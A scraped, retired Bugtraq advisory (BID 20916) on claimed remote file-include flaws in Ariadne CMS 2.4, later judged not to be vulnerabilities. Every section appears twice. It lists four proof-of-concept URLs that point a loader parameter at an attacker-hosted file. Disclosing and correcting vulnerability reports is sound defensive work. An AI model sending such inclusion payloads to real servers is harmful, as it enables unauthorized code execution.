RETIRED: Ariadne CMS Multiple Remote File Include Vulnerabilities
BID:20916
Info
RETIRED: Ariadne CMS Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 20916 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 04 2006 12:00AM |
| Updated: | Nov 07 2006 10:47PM |
| Credit: | Cyber-Security.org is credited with the discovery of this issue. |
| Vulnerable: |
Ariadne Ariadne CMS 2.4 |
| Not Vulnerable: | |
Discussion
RETIRED: Ariadne CMS Multiple Remote File Include Vulnerabilities
Multiple remote file-include vulnerabilities affect Ariadne CMS because the application fails to sufficiently sanitize user-supplied input to affected scripts and parameters.
An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Note: This BID has been retired; new information reveals that these aren't vulnerabilities.
Multiple remote file-include vulnerabilities affect Ariadne CMS because the application fails to sufficiently sanitize user-supplied input to affected scripts and parameters.
An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Note: This BID has been retired; new information reveals that these aren't vulnerabilities.
Exploit / POC
RETIRED: Ariadne CMS Multiple Remote File Include Vulnerabilities
Attackers can exploit this issue via a web client.
The following proofs of concept are available:
www.example.com/script_path/lib/includes/loader.cmd.php?store_config[code]=http://www.example.com/attackerfile
www.example.com/script_path/lib/includes/loader.ftp.php?store_config[code]=http://www.example.com/attackerfile
www.example.com/script_path/lib/includes/loader.soap.php?store_config[code]=http://www.example.com/attackerfile
www.example.com/script_path/lib/includes/loader.web.php?store_config[code]=http://www.example.com/attackerfile
Attackers can exploit this issue via a web client.
The following proofs of concept are available:
www.example.com/script_path/lib/includes/loader.cmd.php?store_config[code]=http://www.example.com/attackerfile
www.example.com/script_path/lib/includes/loader.ftp.php?store_config[code]=http://www.example.com/attackerfile
www.example.com/script_path/lib/includes/loader.soap.php?store_config[code]=http://www.example.com/attackerfile
www.example.com/script_path/lib/includes/loader.web.php?store_config[code]=http://www.example.com/attackerfile
Solution / Fix
RETIRED: Ariadne CMS Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Note: This BID has been retired; new information reveals that these aren't vulnerabilities.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Note: This BID has been retired; new information reveals that these aren't vulnerabilities.
References
RETIRED: Ariadne CMS Multiple Remote File Include Vulnerabilities
References:
References:
- [VIM] DISPUTE: PHP file inclusion in Ariadne 2.4.1 (Heinbockel, Bill)
- [VIM] DISPUTE: PHP file inclusion in Ariadne 2.4.1 (Heinbockel, Bill)
- Ariadne CMS Home Page (Ariadne)
- Ariadne v2.4 (store_config[code]) Remote File Include Vuln (Cyber-Security.org)
- Ariadne <= 2.4.1 Multiple Remote File Include Vulnerabilities(New) ([email protected])